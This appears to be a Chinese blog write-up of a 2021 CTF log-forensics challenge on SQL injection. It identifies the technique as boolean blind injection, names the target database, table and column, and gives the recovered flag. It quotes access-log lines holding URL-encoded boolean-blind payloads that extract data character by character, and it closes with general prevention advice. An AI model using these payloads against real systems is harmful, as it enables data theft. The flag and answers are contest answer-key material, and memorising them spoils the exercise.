[陇剑杯 2021]SQL注入

目录

问(1):

问(2):

问(3):


问(1):

黑客在注入过程中采用的注入手法叫(布尔盲注)(格式为4个汉字,例如“拼搏努力”)

布尔盲注:

布尔盲注攻击利用的是应用程序的逻辑判断方式,在查询语句的WHERE子句中构建条件,使得查询结果只有两种可能:满足条件(TRUE)或不满足条件(FALSE)。如果应用程序根据这些条件做出不同的响应,攻击者可以利用这些响应来推断出数据库中的数据信息,达到获取敏感信息的目的

根据注入特征,使用了substr()函数,推断使用了布尔盲注

问(2):

黑客在注入过程中,最终获取flag的数据库名、表名和字段名是(sqli#flag#flag)。(格式为“数据库名#表名#字段名”,例如database#table#column)

根据日志,可以发现,数据库名为sqli,表名为flag,字段名为flag

问(3):

黑客最后获取到的flag字符串为()

黑客最后获得的flag字符串为flag{deddcd67-bcfd-487e-b940-1217e668c7db}

经过分析,可以发现每当一个字符猜对时下面会返回如下六行信息

172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 430 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"

例如字符4猜对了就会返回如下信息

 由此推断出flag

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入是一种常见的网络攻击方式,利用对输入数据的不充分验证,使恶意用户能够向应用程序的数据库中插入恶意的SQL语句。这种攻击可以导致数据泄露、数据损坏、系统崩溃等安全风险。 要防止SQL注入攻击,我们可以采取以下措施: 1. 使用参数化查询:通过使用参数化查询,可以将用户输入的数据与查询语句分开,从而避免注入攻击。参数化查询可有效防止恶意用户在输入中插入SQL代码。 2. 输入验证:在接收用户输入之前,对输入数据进行验证,确保输入的数据符合预期的格式和长度。例如,可以检查输入是否只包含数字或特定字符,或限制输入的长度。 3. 数据加密:对于敏感数据,例如用户密码或信用卡号等,应该使用加密算法将其存储在数据库中。这样,即使数据被窃取,攻击者也无法轻易地解读其中的内容。 4. 最小权限原则:数据库账户应该具有最低的权限,只能执行必要的操作。这样即使发生注入攻击,攻击者也只能执行有限的操作,从而减少损失。 5. 使用Web应用防火墙(WAF):WAF可以检测和防止SQL注入攻击,通过监视网站的流量和请求,识别并拦截具有潜在危害的恶意请求。 总之,对于开发者来说,必须意识到SQL注入的威胁,并采取一系列措施来减少潜在的安全风险。不断学习和更新安全知识,加强对漏洞的识别和修补,是构建安全可靠的应用程序所必需的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值